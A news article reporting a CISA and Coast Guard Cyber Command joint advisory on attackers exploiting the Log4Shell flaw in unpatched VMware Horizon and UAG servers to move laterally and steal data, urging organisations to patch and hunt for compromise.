CISA: Hackers Still Use Log4Shell to Breach Networks, So Fix Your Systems

Hands typing on a computer with other electronic devices on the table

Flaw in Log4j application logging component known as “Log4Shell” should have been patched by organizations months ago, but some systems that weren’t patched with available updates are still in use by hackers to access corporate networks.

The Cybersecurity & Infrastructure Security Agency (CISA) and the United States Coast Guard Cyber ​​Command (CGCYBER) issued a joint advisory asking administrators to patch VMware Horizon and Unified Access Gateway (UAG) servers running vulnerable versions of Log4j . VMware UAG provides employees with secure remote access to Horizon virtual desktops and applications.

Both VMware products were vulnerable to the Log4Shell flaw, CVE-2021-44228, which was disclosed by Log4j maintainer Apache Software Foundation in December. VMware released patches for its devices in December and January.

SEE: Phishing gang that stole millions by luring victims to fake banking sites is busted by police

It was called Log4Shell because it offered attackers a shell to remotely access internet-connected devices that used Log4j.

“CISA and CGCYBER recommend that all organizations with affected systems that did not immediately apply available patches or workarounds assume a compromise and initiate threat hunting activities,” CISA said. .

According to CISA, the attackers used the flaw to gain access to a victim’s disaster recovery network and steal information, including administrator credentials that allowed lateral movement.

“Since December 2021, multiple groups of malicious actors have exploited Log4Shell on unpatched, public-facing VMware Horizon and UAG servers,” the agencies warn in the alert notice (AA22-174A).

“As part of this exploit, suspected advanced persistent threat actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2). In a confirmed compromise, these APT actors were able to move laterally inside the network, access a disaster recovery network, and collect and exfiltrate sensitive data,” the agencies said.

Log4j is maintained by Apache Software Foundation (ASF), but the open source component is used in a wide range of software on devices from many other vendors, including VMware, Cisco, IBM, and Oracle.

SEE: Cloud Computing Security: Five Things You’re Probably Doing Wrong

Log4Shell was considered difficult to patch due to the range of end-user organizations, device manufacturers, and services involved.

CISA director Jen Easterly said Log4Shell was “one of the most serious I’ve seen in my entire career, if not the most serious”. But in January, she confirmed that CISA had seen no significant intrusions via Log4j, although she still warned that attackers could wait for public alarm on Log4Shell to subside before exploiting affected systems.

Easterly’s warning appears to be justified by subsequent investigations by CISA and CGCYBER into victim networks that show attackers are using the flaw for more than installing “cryptojackers” or CPU-abusing cryptomining malware.

CGCYBER conducted a threat hunting mission in a victim organization that was using a vulnerable version of VMware Horizon and discovered that the attackers had installed malware posing as Microsoft’s software for administrators.

At a second victim site the agencies investigated, hackers first gained access to the VMware Horizon server and then used Windows Remote Desktop Protocol (RDP) to gain access to hosts in the production environment of the target, including a security management server, a certificate server, a database containing sensitive law enforcement data, and a mail relay server. RDP is the primary method for ransomware attackers to compromise a network.

The attackers at the second victim site also used RDP to access the disaster recovery network.

“Threat actors obtained credentials for multiple accounts, including administrator accounts. It is unclear how these credentials were acquired,” CISA notes.

Source link

Steven L. Nielsen